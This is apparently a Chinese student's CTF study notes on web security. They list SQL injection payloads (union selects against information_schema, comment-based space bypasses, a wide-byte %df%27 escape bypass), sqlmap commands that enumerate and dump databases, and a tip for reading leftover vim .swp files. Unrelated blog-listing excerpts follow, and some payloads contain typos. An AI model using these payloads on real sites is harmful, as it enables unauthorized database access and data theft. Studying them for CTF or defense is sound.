繞過空格的方法:
+ %0a %0b /**/
在mysql中,有乙個庫叫做 information_schema,裡面包含了資料庫中所有庫的資訊,我們可以在注入的時候用它來做很多壞事情。
注入點的確定:
用select database() 來確定資料庫名稱 1』 union select database()』
呼叫information_schema 來檢視所有資訊,我們可以用它來做很多壞事
1』 union select table_name from information_schema.tables where table_schema =』 《資料表名》
確定欄位名
1』 union select column_name from informaiton_schema.columnsa where table_name=』《欄位名》
確定欄位名中的內容
1』 union select from where 『1』=』1
1』 union//select//flag from//flag where//』1』=』1
《備註:我感覺用#不太好,因為會被過濾掉,還是上頭那個靠譜》
『//union//select//flag//from/**/flag#
(注入點都用1』來代替了,具體操作都不一樣。明智的人應該懂得如何手注而不是用工具)
sqlmap -u」」 直接檢視嘛~~ 然後加上 –dbs 倒庫
(前提是你要找到注入點啊!!!)
找到庫了之後呢 就 sqlmap -u 「」 -d 《表名》 –tables
(備註 -d 是進入,–tables 能夠檢視當前庫下的東西)
然後 sqlmap -u 「」 -d 《表名》 -t 《字段》 《字段》 –dump
(備註 –dump 能夠把資料裡的東西全部到出來)
(就是一次比較簡單的sqlmap搞事了)
注入 特徵:
出現 11』 and 1=2 # 時候會變成
』 1\』 and 1=2 # 為了把\給去掉
要改為 11%df%27 and 1=2 # /%df就是乙個寬位元組 %27 是引號
(可能這裡理解有問題。。。。。。。。。。。。)
1』 union select 1,database()
%df』 union select 1,database() %23
關於寬位元組的可以看看這裡
一些愚蠢的開發者會把vim的備份檔案不刪掉,
用/.《name》.swp 訪問它
簡單的抓包,截包,改包操作。
對於包的熟悉能夠讓你做很多事情
以後burp的功能會在做題中慢慢提公升
就這樣隨意寫點覺得重要的知識點吧,可能有地方有錯誤的,歡迎指正哈哈。
大一的一些心得與近況
下週就離開北方,從瀋陽飛西安 大一結束了,要填的坑太多了,總覺得要總結一下才能踏實的繼續學下去 你會選擇詩與遠方,還是會選擇柴公尺油鹽?而我還在苟且學習web安全,風雨兼程 總想著認真記錄部落格,可好久沒認真寫過了,偶然所得也是記在印象筆記上,想著哪一天心血來潮把它們都整理到部落格上,可是還是 懶 ...
Visual C 一些開發心得與除錯技巧
自己平時收集的一些技巧與心得,這裡分享出來,普及一下知識。1.如何在release狀態下進行除錯 project setting projectsetting對話方塊,選擇release狀態。c c 標籤中的category選general,optimizations選disable debug d...
學習PKI的一些心得與思考 1
為了專案需要.學習了一下pki.而且據說大三上也是要學這門課的.看了些許資料後大致了解了這個基本概念及實現方法和一些基本架構.以下是自己的一些總結思考.不是嚴格的教學內容.1 如果客戶端和服務端之間的通訊是用明文傳輸的.那麼黑客只要能夠抓到你的通訊包.也就能獲得你的所有資訊了.所以明文通訊是非常不安...